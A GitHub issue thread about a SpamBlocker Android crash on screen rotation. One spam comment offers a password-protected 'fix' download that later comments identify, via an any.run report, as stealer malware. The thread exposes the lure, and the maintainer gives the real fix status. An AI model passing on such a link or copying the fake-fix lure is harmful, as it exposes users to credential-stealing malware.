### ISSUE TITLE
lateinit property initFilter has not been initialized

### ISSUE THREAD

**Issue by JEAYNE** [aj3423/SpamBlocker#119]
Hi,

Here the stack trace I just got:

```
android version: 34
app version: 1.20
K1.h: lateinit property initFilter has not been initialized
 at i2.r.G(Unknown Source:1341)
 at e0.U.f(Unknown Source:298)
 at e0.U.k(Unknown Source:146)
 at e0.N.N(Unknown Source:61)
 at e0.N.t(Unknown Source:35)
 at h.i.D(Unknown Source:33)
 at h.i.onStart(Unknown Source:0)
 at android.app.Instrumentation.callActivityOnStart(Instrumentation.java:1582)
 at android.app.Activity.performStart(Activity.java:9008)
 at android.app.ActivityThread.handleStartActivity(ActivityThread.java:4198)
 at android.app.servertransaction.TransactionExecutor.performLifecycleSequence(TransactionExecutor.java:225)
 at android.app.servertransaction.TransactionExecutor.cycleToPath(TransactionExecutor.java:205)
 at android.app.servertransaction.TransactionExecutor.executeLifecycleState(TransactionExecutor.java:177)
 at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:98)
 at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2685)
 at android.os.Handler.dispatchMessage(Handler.java:106)
 at android.os.Looper.loopOnce(Looper.java:230)
 at android.os.Looper.loop(Looper.java:319)
 at android.app.ActivityThread.main(ActivityThread.java:8919)
 at java.lang.reflect.Method.invoke(Native Method)
 at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:578)
 at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1103)

```
I think it happened during the rotation of my phone.

Best Regards

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by aj3423** [comment]
@JEAYNE Ah, same issue as https://github.com/aj3423/SpamBlocker/issues/114, I'm upgrading the UI library, it will be fixed then.
@Aadya1603 What is this?

**Comment by JEAYNE** [comment]
I have the reply to your question "_What is this ?_"
@Aadya1603 will not reply. His account is disabled...

After my post here I received two e-mails from Github:

![WhatIsThis](https://github.com/user-attachments/assets/5877c202-67b4-4a68-bda5-d36f0ebd47cc)

The first one received at 4:53pm is from  Aadya Madankar. His github account @Aadya1603 is no more valid.
The second at 4:58pm is your reply to my post with your question to Aadya 

Acording to any.run the link in the post from Aadya is a malware (Stealer)
https://any.run/report/4bb449ede4be82a8ccd999389fb4a90c46d283a6aca7c9e0389d27a783f84d7d/8770ac14-dc4e-417b-b57d-83d611ff868a

According to google this link has been posted in at least two other projects:

![MaliciousLink](https://github.com/user-attachments/assets/3cca1961-e827-417e-99b9-c0545035c130)

**Comment by aj3423** [comment]
I see, maybe that bot is monitoring new posts on GitHub.
